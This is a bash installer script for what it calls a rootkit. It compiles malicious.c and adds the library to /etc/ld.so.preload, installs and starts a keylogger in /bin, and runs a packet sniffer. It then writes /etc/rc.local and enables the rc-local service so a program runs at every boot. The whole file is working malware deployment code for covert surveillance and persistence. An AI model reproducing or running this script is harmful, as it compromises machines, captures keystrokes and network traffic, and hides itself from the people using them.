#!/usr/bin/env bash

if [ $# -lt 2 -a -z "${klg}" -a -z "${psn}" ]; then
    echo usage: $0 \<keylog log\> \<packet sniffer log\>
fi

if [ ! -f /lib/x86_64-linux-gnu/malicious.so ]; then
    echo compiling rootkit
    gcc -fpic -shared -o malicious.so malicious.c -nostartfiles -ldl

    mv malicious.so /lib/x86_64-linux-gnu/malicious.so

    echo adding to ld_preload
    echo /lib/x86_64-linux-gnu/malicious.so >> /etc/ld.so.preload
fi

if [ ! -f /bin/keylog ]; then
    gcc keylog.c -o keylog
    mv ./keylog /bin/keylog
fi

legitimate=a sudo > /dev/null 2> /dev/null

echo starting keylogger
keylog "${klg:-$1}" &

if [ $? -ne 0 ]; then
    case $? in
        1)
            echo unable to create output file
            exit 1
            ;;
        2)
            echo unable to open keyboard device \(maybe requires su\?\)
            exit 1
            ;;
        *)
            echo unknown error
            exit 1
            ;;
    esac
fi

klg="$1"

echo starting packet sniffer
python3 sniffer.py "${psn:-$2}"

if [ $? -ne 0 ]; then
    case $? in
        1)
            echo unable to open socket
            exit 1
            ;;
        2)
            echo unable to open file
            exit 1
            ;;
        *)
            echo unknown error
            exit 1
            ;;
    esac
fi

klg="$2"

if [ ! -f /etc/rc.local ]; then
    printf "#!" > /etc/rc.local
    printf "/bin/sh\n$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )/super_cool_program\nexit 0" >> /etc/rc.local
    chmod -v +x /etc/rc.local
    systemctl enable rc-local.service
fi